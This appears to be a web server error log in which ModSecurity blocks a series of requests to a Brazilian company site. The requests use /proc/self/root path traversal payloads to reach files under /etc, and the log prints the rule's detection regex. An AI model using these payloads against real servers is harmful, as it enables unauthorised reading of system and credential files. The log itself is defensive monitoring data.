[Fri Mar 20 03:55:15.316448 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:58852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvU_XLqtnMIWvjpaJqzQAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:16.662128 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:59518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvVBCii7xarUs8iHY16QAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:18.078066 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.241.31:55082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvVhCii7xarUs8iHY17gAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:19.358996 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.241.31:55092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvV_HIg5MgXLBnicPNagAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:20.520351 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:55104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvWDJ3M9BSuKP7CAbh4QAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:20.797633 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.241.31:55104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvWDJ3M9BSuKP7CAbh4wAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:25.290179 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.241.31:55118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvXTJ3M9BSuKP7CAbh8wAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:27.474747 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.241.31:55124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvXvHIg5MgXLBnicPNdgAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:29.637134 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:54518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvYfHIg5MgXLBnicPNeAAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:31.079733 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.241.31:54528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvY_XLqtnMIWvjpaJq1wAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:31.987937 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.243.128:36200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvYwF0L0L-SsrnPo457wAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:32.451494 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.241.31:54534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvZPHIg5MgXLBnicPNegAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:33.305034 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:37044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvZda6ubjKNq_cu4agXQAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:33.788153 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.241.31:54548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvZfXLqtnMIWvjpaJq2gAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:35.027571 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.241.31:54564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvZzJ3M9BSuKP7CAbh-wAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:36.356325 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:54568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvaDJ3M9BSuKP7CAbh_gAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:37.635175 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:47554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvaTJ3M9BSuKP7CAbiAQAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:38.922981 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:47558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvauoXxyEfFpUF8f9VaAAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:40.229663 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.241.31:47572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvbPqxLDW4GITHUkSzuAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:41.644823 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.241.31:47584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvbfHIg5MgXLBnicPNhQAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:42.951076 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.241.31:47590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvbl1pVZ5mVmJwsFMC5gAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:44.320297 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.241.31:47594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvcPHIg5MgXLBnicPNigAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
